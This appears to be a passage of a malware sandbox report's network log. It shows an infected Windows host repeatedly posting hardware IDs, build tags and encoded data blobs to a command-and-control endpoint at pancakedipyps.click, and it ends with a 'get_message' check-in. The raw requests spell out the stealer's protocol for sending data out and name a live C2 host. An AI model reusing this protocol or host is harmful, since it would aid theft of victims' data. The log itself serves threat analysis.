2024-12-22 01:21:37 UTC	1369	IN	Data Raw: 38 75 59 6b 38 33 63 4a 4f 4f 30 53 42 74 50 66 52 5a 41 46 62 54 65 61 31 54 56 70 54 39 41 69 41 35 50 59 52 57 35 72 46 45 2b 31 37 79 36 32 4a 45 42 32 72 6c 51 41 79 70 63 56 30 43 56 45 49 59 76 75 4f 47 31 64 6c 6a 5a 4f 67 4a 64 46 5a 43 39 4d 42 4c 6e 70 4a 36 45 71 51 44 37 6b 48 51 66 57 33 55 43 58 41 32 49 2b 6e 4e 67 34 61 6b 48 57 4a 51 2b 65 33 30 31 73 62 78 73 45 2f 4b 45 76 71 32 38 52 64 73 41 66 45 66 50 5a 52 6f 4a 44 65 48 32 41 6e 44 46 69 42 6f 35 70 44 70 44 57 53 6d 5a 6a 48 45 43 67 34 53 4f 36 49 45 67 35 34 42 63 47 32 4e 39 66 6c 67 4e 73 4f 35 37 55 4d 6d 42 55 31 79 5a 41 31 35 64 46 63 43 39 4d 42 49 50 33 4c 37 51 67 43 78 2f 6e 44 77 62 59 31 45 61 63 51 33 68 39 67 4a 77 78 59 67 61 4f 61 51 32 56 32 6b 5a 36 59 78 52 Data Ascii: 8uYk83cJOO0SBtPfRZAFbTea1TVpT9AiA5PYRW5rFE+17y62JEB2rlQAypcV0CVEIYvuOG1dljZOgJdFZC9MBLnpJ6EqQD7kHQfW3UCXA2I+nNg4akHWJQ+e301sbxsE/KEvq28RdsAfEfPZRoJDeH2AnDFiBo5pDpDWSmZjHECg4SO6IEg54BcG2N9flgNsO57UMmBU1yZA15dFcC9MBIP3L7QgCx/nDwbY1EacQ3h9gJwxYgaOaQ2V2kZ6YxR
2024-12-22 01:21:37 UTC	1369	IN	Data Raw: 50 4d 6b 52 7a 50 68 47 41 33 56 32 56 2b 52 43 57 73 79 6e 74 73 39 66 45 33 45 49 67 69 61 32 55 70 68 62 78 70 45 73 2b 77 6f 38 32 45 4a 4d 66 68 55 58 35 4c 79 62 6f 63 56 62 58 47 36 79 79 42 6b 51 64 6f 2f 43 35 6a 55 56 47 56 2f 56 41 72 79 38 43 2b 69 62 78 45 67 38 41 4d 41 7a 5a 6c 55 30 41 52 72 63 38 47 63 50 57 46 49 32 79 49 45 6b 4e 4a 4b 61 32 6f 52 54 72 37 74 4b 62 73 6d 51 7a 50 6c 45 67 33 52 32 55 4b 52 44 32 4d 36 6c 39 56 32 49 41 62 52 4d 55 44 42 6c 33 52 34 61 41 78 4a 6f 71 4d 61 73 44 35 59 49 2b 30 45 41 5a 44 34 54 70 77 41 59 6a 53 4a 6e 43 6b 67 58 35 59 75 44 4e 6d 50 41 6d 68 72 47 45 65 31 37 79 65 2b 49 45 34 39 37 78 34 4a 77 4e 68 49 6d 41 39 76 50 6f 76 57 50 48 78 50 33 79 51 4f 6b 63 56 42 4b 43 46 55 51 36 71 68 Data Ascii: PMkRzPhGA3V2V+RCWsynts9fE3EIgia2UphbxpEs+wo82EJMfhUX5LybocVbXG6yyBkQdo/C5jUVGV/VAry8C+ibxEg8AMAzZlU0ARrc8GcPWFI2yIEkNJKa2oRTr7tKbsmQzPlEg3R2UKRD2M6l9V2IAbRMUDBl3R4aAxJoqMasD5YI+0EAZD4TpwAYjSJnCkgX5YuDNmPAmhrGEe17ye+IE497x4JwNhImA9vPovWPHxP3yQOkcVBKCFUQ6qh
2024-12-22 01:21:37 UTC	1369	IN	Data Raw: 64 30 30 51 49 4b 77 74 52 49 6c 7a 31 5a 50 5a 37 49 4d 57 42 41 31 6d 6c 4f 32 64 67 43 4d 46 5a 55 44 50 4c 65 5a 76 4d 33 43 57 36 67 49 51 54 63 32 55 71 47 45 69 6f 51 6a 73 6f 38 64 51 54 77 4c 68 47 51 77 55 39 36 4c 31 6f 45 74 4b 46 77 34 32 45 4a 4d 76 46 55 58 34 4b 46 46 73 56 51 4d 47 50 4c 77 33 68 33 42 73 42 70 57 4d 75 5a 41 6e 6f 76 54 41 54 31 34 6a 71 68 4b 55 6f 67 34 31 4d 35 37 50 64 47 68 67 4a 71 4f 4a 58 69 43 48 74 46 32 43 63 48 6a 38 59 43 4a 69 38 62 42 4f 72 59 61 50 74 76 64 6e 69 67 44 45 65 4b 6c 33 69 54 44 57 6b 30 6a 38 31 37 54 6b 33 41 4b 41 32 53 32 77 42 70 59 67 52 44 38 71 39 6f 74 57 38 52 5a 71 35 55 41 38 4f 58 46 63 42 52 50 47 62 4b 69 32 59 38 57 5a 67 77 51 49 2b 58 47 6a 6f 68 56 46 62 79 75 57 6a 30 4c Data Ascii: d00QIKwtRIlz1ZPZ7IMWBA1mlO2dgCMFZUDPLeZvM3CW6gIQTc2UqGEioQjso8dQTwLhGQwU96L1oEtKFw42EJMvFUX4KFFsVQMGPLw3h3BsBpWMuZAnovTAT14jqhKUog41M57PdGhgJqOJXiCHtF2CcHj8YCJi8bBOrYaPtvdnigDEeKl3iTDWk0j817Tk3AKA2S2wBpYgRD8q9otW8RZq5UA8OXFcBRPGbKi2Y8WZgwQI+XGjohVFbyuWj0L
2024-12-22 01:21:37 UTC	1369	IN	Data Raw: 58 46 74 48 58 52 74 42 4e 4a 7a 58 5a 68 47 51 67 42 74 49 34 51 4d 47 48 45 44 4d 36 52 78 50 69 73 7a 66 39 4e 67 6b 67 6f 45 78 56 6e 4a 64 66 30 46 73 6e 64 4a 72 4f 4a 47 68 46 77 43 70 48 70 2b 6c 6b 61 32 67 53 52 37 7a 32 4f 66 45 41 53 6a 33 73 47 41 44 45 36 58 4f 46 41 47 6b 39 6e 73 6f 6e 4c 67 69 57 4a 6b 44 42 37 67 4a 35 5a 52 4d 49 2b 71 30 35 6f 43 46 43 49 4f 64 55 4f 4a 79 58 56 64 42 62 4a 77 61 61 30 6a 68 70 55 4d 64 6b 4a 70 72 51 52 47 74 68 41 31 58 79 72 32 69 31 62 78 46 6b 72 6c 51 44 77 35 63 56 77 46 45 38 5a 73 71 4c 5a 6a 78 5a 6d 44 42 41 6a 35 63 61 4f 79 46 55 56 76 4b 35 61 50 51 68 52 44 66 6a 47 67 54 41 78 55 75 54 46 57 52 30 70 2b 49 54 59 30 76 54 4a 77 65 6e 36 57 4e 69 66 78 6c 4c 74 64 38 57 68 44 35 4f 4a 71 Data Ascii: XFtHXRtBNJzXZhGQgBtI4QMGHEDM6RxPiszf9NgkgoExVnJdf0FsndJrOJGhFwCpHp+lka2gSR7z2OfEASj3sGADE6XOFAGk9nsonLgiWJkDB7gJ5ZRMI+q05oCFCIOdUOJyXVdBbJwaa0jhpUMdkJprQRGthA1Xyr2i1bxFkrlQDw5cVwFE8ZsqLZjxZmDBAj5caOyFUVvK5aPQhRDfjGgTAxUuTFWR0p+ITY0vTJwen6WNifxlLtd8WhD5OJq

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	50523	172.67.209.202	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:21:39 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=C84PJX9V2KB3Z1K3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 13243 Host: pancakedipyps.click
2024-12-22 01:21:39 UTC	13243	OUT	Data Raw: 2d 2d 43 38 34 50 4a 58 39 56 32 4b 42 33 5a 31 4b 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 43 38 34 50 4a 58 39 56 32 4b 42 33 5a 31 4b 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 38 34 50 4a 58 39 56 32 4b 42 33 5a 31 4b 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 43 38 34 Data Ascii: --C84PJX9V2KB3Z1K3Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--C84PJX9V2KB3Z1K3Content-Disposition: form-data; name="pid"2--C84PJX9V2KB3Z1K3Content-Disposition: form-data; name="lid"FATE99--test--C84
2024-12-22 01:21:40 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:21:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p1sc8d3v7vqhihj77uferhgb54; expires=Wed, 16 Apr 2025 19:08:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QUMXdywjicM5lneceZQo4K4pXCXf31fBBYd0PfTDWgSzRm5JxhrMI7FbywZVmkzjIdzgFgxPQ0wpQx%2BDTtEtVIiVwZVnJiOpVAUzu%2BOTUPlRTDHUgI4G2L%2F07JyjghqLrPjV07tv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4bdf7b997279-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1819&rtt_var=695&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2848&recv_bytes=14184&delivery_rate=1558996&cwnd=220&unsent_bytes=0&cid=83d8c14e222dbc32&ts=1169&x=0"
2024-12-22 01:21:40 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:21:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.4	50526	172.67.209.202	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:21:42 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Q56VLCO4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8723 Host: pancakedipyps.click
2024-12-22 01:21:42 UTC	8723	OUT	Data Raw: 2d 2d 51 35 36 56 4c 43 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 35 36 56 4c 43 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 35 36 56 4c 43 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 51 35 36 56 4c 43 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 Data Ascii: --Q56VLCO4Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--Q56VLCO4Content-Disposition: form-data; name="pid"2--Q56VLCO4Content-Disposition: form-data; name="lid"FATE99--test--Q56VLCO4Content-Dispositi
2024-12-22 01:21:42 UTC	1134	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:21:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=49imcf2h3jdvb70i62kthrkth0; expires=Wed, 16 Apr 2025 19:08:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DLtk3NaOqkbjZLdDss8Yi%2BdsW0gAw6cH0v%2FQqGS5UCbQi%2BuSczUWMXTcW6kNSfu0Bk3w8qEt5ETHCu6bH77Qn3nbnqQJlXDiBHhjpg%2FgkCjFSFCBpAI%2FII934b%2BdlN4gHAapEuee"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4beeaf9f42d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1549&rtt_var=600&sent=11&recv=14&lost=0&retrans=0&sent_bytes=2849&recv_bytes=9655&delivery_rate=1794714&cwnd=245&unsent_bytes=0&cid=a112dbf0b4679559&ts=920&x=0"
2024-12-22 01:21:42 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:21:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	50527	172.67.209.202	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:21:44 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=K7MCZHBBFF0P3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20406 Host: pancakedipyps.click
2024-12-22 01:21:44 UTC	15331	OUT	Data Raw: 2d 2d 4b 37 4d 43 5a 48 42 42 46 46 30 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 37 4d 43 5a 48 42 42 46 46 30 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 37 4d 43 5a 48 42 42 46 46 30 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 4b 37 4d 43 5a 48 42 42 46 46 30 50 Data Ascii: --K7MCZHBBFF0P3Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--K7MCZHBBFF0P3Content-Disposition: form-data; name="pid"3--K7MCZHBBFF0P3Content-Disposition: form-data; name="lid"FATE99--test--K7MCZHBBFF0P
2024-12-22 01:21:44 UTC	5075	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-22 01:21:45 UTC	1125	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:21:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bdd9417l814jd5r1g31ou8feo0; expires=Wed, 16 Apr 2025 19:08:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E2G8y1ab9fSRIdBBLcHebcFHS4dQBTuiJgGJkE2DQCRtB1KZXlJz9PEqZGSUbKnDaOyNKPCoSJGOONJn%2FLbFMr9eLEAWwLYFPtn1tQ4SAsQ3aF7kZ4nDCP88eQAJVPvEWe0rJly5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4bfc498e1a44-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1791&rtt_var=687&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21366&delivery_rate=1574123&cwnd=128&unsent_bytes=0&cid=515f1ebf0047ed83&ts=985&x=0"
2024-12-22 01:21:45 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:21:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	50533	172.67.209.202	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:21:46 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=31BRR4LV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1294 Host: pancakedipyps.click
2024-12-22 01:21:46 UTC	1294	OUT	Data Raw: 2d 2d 33 31 42 52 52 34 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 31 42 52 52 34 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 31 42 52 52 34 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 33 31 42 52 52 34 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 Data Ascii: --31BRR4LVContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--31BRR4LVContent-Disposition: form-data; name="pid"1--31BRR4LVContent-Disposition: form-data; name="lid"FATE99--test--31BRR4LVContent-Dispositi
2024-12-22 01:21:47 UTC	1126	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:21:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=earufd936dgg4torboprgbjalp; expires=Wed, 16 Apr 2025 19:08:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0nqTu2eJBFgWTf2Obe%2B5k3XxPFqE1dd25CmgaKK8Idkey2Og4SKBuZjzJata5FppxyL5UrhPOLm3iPSW93hQbRJf7S4qS7lSx6obKpuTSq95GXO3gn%2BpiQRm8YbDPVm%2Bgos9MVLy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4c0dac2a7d00-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1790&rtt_var=681&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2204&delivery_rate=1594756&cwnd=243&unsent_bytes=0&cid=2b256ddd122268d4&ts=783&x=0"
2024-12-22 01:21:47 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:21:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	50541	172.67.209.202	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:21:49 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ZMA2HLU9L0U1ZF61VHH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 29573 Host: pancakedipyps.click
2024-12-22 01:21:49 UTC	15331	OUT	Data Raw: 2d 2d 5a 4d 41 32 48 4c 55 39 4c 30 55 31 5a 46 36 31 56 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 4d 41 32 48 4c 55 39 4c 30 55 31 5a 46 36 31 56 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 4d 41 32 48 4c 55 39 4c 30 55 31 5a 46 36 31 56 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 Data Ascii: --ZMA2HLU9L0U1ZF61VHHContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--ZMA2HLU9L0U1ZF61VHHContent-Disposition: form-data; name="pid"1--ZMA2HLU9L0U1ZF61VHHContent-Disposition: form-data; name="lid"FATE99--te
2024-12-22 01:21:49 UTC	14242	OUT	Data Raw: 40 d5 15 bc a3 14 96 1b 59 e7 f3 0d 82 16 5a 1a 87 f0 c2 a0 61 e1 bb b5 85 a4 a2 be b7 6e dc 5a 89 c9 6f 0d 37 33 24 7c f5 12 29 1e 50 51 4b c2 da c6 6e f9 6d 37 3e ba 07 00 b9 05 ae d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f 15 Data Ascii: @YZanZo73$\|)PQKnm7>5OEK?6V,i<0egW\ro`#R\\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_\|x5mDom;z/
2024-12-22 01:21:50 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:21:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h8dgoaa2iuqbci6c7vb1li3aq1; expires=Wed, 16 Apr 2025 19:08:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xFhTdHl4YSTzUS1poQvJ1duMwDerca6VRzF3nyavNbMu6Qopsql42F29LSdu4m63m3SZwN1I08jhGaRZ6MM%2BXg7Jo9b%2FAjnh4WstE7ttIuKHKUPl3613%2FU4pcPxjR1dlvBAmIY0%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4c1e080a42b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1632&rtt_var=615&sent=21&recv=32&lost=0&retrans=0&sent_bytes=2848&recv_bytes=30561&delivery_rate=1789215&cwnd=218&unsent_bytes=0&cid=f05c6bd52761366b&ts=948&x=0"
2024-12-22 01:21:50 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:21:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	50544	172.67.209.202	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:21:51 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 81 Host: pancakedipyps.click
2024-12-22 01:21:51 UTC	81	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=F14195A540BC0B98AC8923850305D13E
